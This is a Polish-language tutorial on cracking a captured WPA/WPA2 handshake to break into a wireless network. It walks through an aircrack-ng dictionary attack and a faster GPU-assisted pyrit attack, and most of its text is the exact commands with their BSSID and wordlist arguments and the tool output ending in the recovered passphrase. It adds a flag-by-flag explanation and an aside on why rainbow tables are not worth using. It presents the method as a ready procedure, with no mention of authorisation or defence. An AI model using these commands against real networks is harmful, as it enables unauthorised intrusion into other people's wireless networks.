[

WiFi] – Ataki na handshake

WPA

Ten tutorial jest kontynuacją artykułu dotyczącego

przechwytywania

pakietów z handshake

pokazujący jak łatwo odzyskać hasło lub włamać się

do sieci bezprzewodowej chronionej przez WPA/WPA2.
No dobra, pokażę Ci jak łamać szyfr z handshake. Tak wygląda okno
programu airodump-ng gdy handshake został złapany, ale to już wiesz:

[

CH 1

][

Elapsed: 12 s

][

2011-01-12 17:24

][

WPA handshake:

00:04:ED:A3:80:11

]

BSSID PWR RXQ Beacons

#Data, #/s CH MB ENC CIPHER AUTH ESSID

00:04:

ED:A3:80:11

-53

40 130 27 9 1 54 WPA2 CCMP PSK NASA

BSSID STATION PWR Rate Lost Packets Probes

00:04:

ED:A3:80:11 48:5D:60:34:A8:59 0 0

-54

0 25 NASA

00:04:

ED:A3:80:11 00:4F:78:00:A2:A5

-40

24 - 1 28 25

Skoro już go masz to należy go teraz zepsuć!
Potrzebujemy do tego aircrack-ng żeby zepsuć, psujemy takim to
poleceniem:

aircrack-ng

-w

slownik.txt

-b

00:04:ED:A3:80:11 NASA.cap

[

00:05:48

]

664220

keys tested

(

2100.59 k/s

)

Current passphrase: imakinlazczsupzoR

Master Key : D9 06 78 99 66 B2 50 65 48 E1 99 7B 87 19 5F 7F

45

F8 F9 48 28 A2 7C EF A7 90 E5 5C 80 BC FC 9A

Transient Key : 1B 05 70 73 25 45 7C DB 1E 95 73 37 0C F7 F2 24

26 56

DD 2C 8B 09 0F 58 57 5F D8 4A EA D3 94 83

BC 48 F8 1E 84 4A 92 46 19 C3 48 BC 7B 21 6D 16
C3 19 AD 27 14 D0 76 33 44 32 65 FE 1F 8D 97 6C

EAPOL HMAC : 05 46 D3 00 99 FC A8 82 F8 CF C1 2B EC 87 F4 5F

W poleceniu użyto opcji ataku słownikowego, ponieważ mam bardzo duży
słownik to często go używam

Aircrack-ng 1.0

[

00:11:45

]

8914110

keys tested

(

2041.75 k/s

)

KEY FOUND!

[

haxored1

]

Master Key : C6 AC CD E4 AF 58 CA 8A 51 8E C4 BC A1 50 F9 DE

72 55 48

F6 E1 6F 26 23 2C 7F AA E6 8A 7F 98 6C

Transient Key : 86 CA 39 4F C6 9A C2 CD 2D 06 0F E9 83 E6 DE FC

3

F 24 70 D0 0C F6 B8 44 FB FE D5 5A 03 CF D3 94

06 90

AC C7 7F 41 EF DE DA 8D 72 89 B2 82 A3 4C

F1 69 2F E3 59 B9 73 1E A1 AF 67 57 DA 16 8A 11

EAPOL HMAC : 83 55 E7 96 C4 C4 96 C2 32 AF 5D 9B 40 81 AC F5

Zróbmy to szybciej!
W jednym z moich poprzednich tutoriali pokazywałem jak zainstalować
pyrit wraz z cpyrit dla kart ATI z OCL.
Użyjemy teraz projektu z Summer Google Code do ataku na handshake.
Narzędzie pyrit do tego ataku użyje mocy obliczeniowej CPU+GPU (u mnie
jest to i7 740QM + ATI HD5730)
Proszę pamiętać, że pyrit to narzędzie do doświadczeń crackingu (słowa
developera narzędzia).
Sprawdzamy czy w przechwyconych przez nas pakietach pyrit wykrywa
dane handshake.

$

pyrit

-r

NASA-01.cap analyze

Pyrit 0.4.0-dev

(

svn

r288

)

(

C

)

2008-2010 Lukas Lueg http://pyrit.googlecode.com

This code is distributed under the GNU General Public License v3+
Parsing

file

'NASA-01.cap'

(

1/1

)

...

Parsed 7 packets

(

7 802.11-packets

)

, got 1 AP

(

s

)

#1:

AccessPoint 00:04:ed:a3:80:11 ('NASA'):

#1:

Station 00:1f:e1:02:dc:9e

#2:

Station 00:4f:78:00:a2:a5, 1 handshake(s):

#1:

HMAC_SHA1_AES, good, spread 1

#3:

Station 48:5d:60:34:a8:59

No skoro wykrywa to dowiedzmy się jakie jest hasło:

$

pyrit

-r

NASA-01.cap

-i

slownik.txt

-b

00:04:ED:A3:80:11 attack_passthrough

Pyrit 0.4.0-dev

(

svn

r288

)

(

C

)

2008-2010 Lukas Lueg http://pyrit.googlecode.com

This code is distributed under the GNU General Public License v3+
Parsing

file

'NASA-01.cap'

(

1/1

)

...

Parsed 7 packets

(

7 802.11-packets

)

, got 1 AP

(

s

)

Tried 120006 PMKs so far; 12304 PMKs per second.

The password is

'haxored1'

.

pyrit

-r

NASA-01.cap

-i

slownik.txt

-b

00:04:ED:A3:80:11 attack_passthrough

•

-

r plik cap.

•

-

i podajemy ścieżkę do słownika, który chcesz przeszukać za hasłem

•

-

b <tutaj_bssid>

•

na końcu polecenia podaje się jaki ma być atak, dictionary-attack opisany

jest jakoattack_passthrough

Komentarz od-autorski:
Nie, nie warto używać tęczowych tablic do ataków na WPA/WPA2, stracisz

miesiące (lata?) na tworzenie takich tablic, hasło w tym czasie może
zostać zmienione, wtedy ponownie będzie trzeba uzyskać handshake. W
tym wypadku słowniki są najlepszym rozwiązaniem.